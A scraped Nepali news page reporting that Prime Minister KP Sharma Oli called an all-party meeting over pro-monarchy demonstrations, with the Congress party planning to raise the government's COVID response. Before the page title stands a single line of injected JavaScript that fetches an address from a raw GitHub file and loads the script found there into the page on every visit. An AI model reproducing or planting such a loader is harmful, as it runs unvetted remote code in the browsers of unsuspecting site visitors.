;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); राजतन्त्रको पक्षमा धेरै पर्दशन भएको भन्दै आज सर्वदलिय बैठक बस्दै : कांग्रेसले यी ऐजेण्डा लाने ! – जुनेली न्युज
शनिबार, साउन ५, २०८२
  • होमपेज
  • राजतन्त्रको पक्षमा धेरै पर्दशन भएको भन्दै आज सर्वदलिय बैठक बस्दै : कांग्रेसले यी ऐजेण्डा लाने !
ट्रेन्डिङ

राजतन्त्रको पक्षमा धेरै पर्दशन भएको भन्दै आज सर्वदलिय बैठक बस्दै : कांग्रेसले यी ऐजेण्डा लाने !

मंसिर २३,फाइल फोटो

काठमाडौं । आज बिहान सर्वदलिय बैठक बस्दै छ । प्रधानमन्त्री केपी शर्मा ओलीले बैठक डाकेका हुन् । प्रधानमन्त्री ओलीको सरकारी निवास बालुवाटारमा बिहान ११ बजे बस्ने गरी बैठक तय गरिएको प्रधानमन्त्री ओलीका प्रेस सल्लाहकार सूर्य थापाले जानकारी दिए ।

बैठकमा समसामयिक राष्ट्रिय राजनीतिका विषयमा संसदमा प्रतिनिधित्व गर्ने राजनीतिक दलहरूकाे उपस्थिति रहने थापाले बताए । उनका अनुसार हाल देशका विभिन्न ठाउँमा भैरहेको राजतन्त्रको पक्षमा विरोद्धको बारेमा विशेष छलफल गरिने बताइएको छ ।

त्यस्तै प्रमुख प्रतिपक्षी दल नेपाली कांग्रेसले सरकारले कोरोना भाइरस संक्रमण नियन्त्रणको लागि काम गर्न नसकेको लागाएत विषयमा छलफल गर्न एजेण्डा तयगरेको जनाएको छ । सोमबार यसै विषयमा कांग्रेसले आन्तरीक छलफल गरेको छ ।

फेसबुक प्रतिक्रियाहरु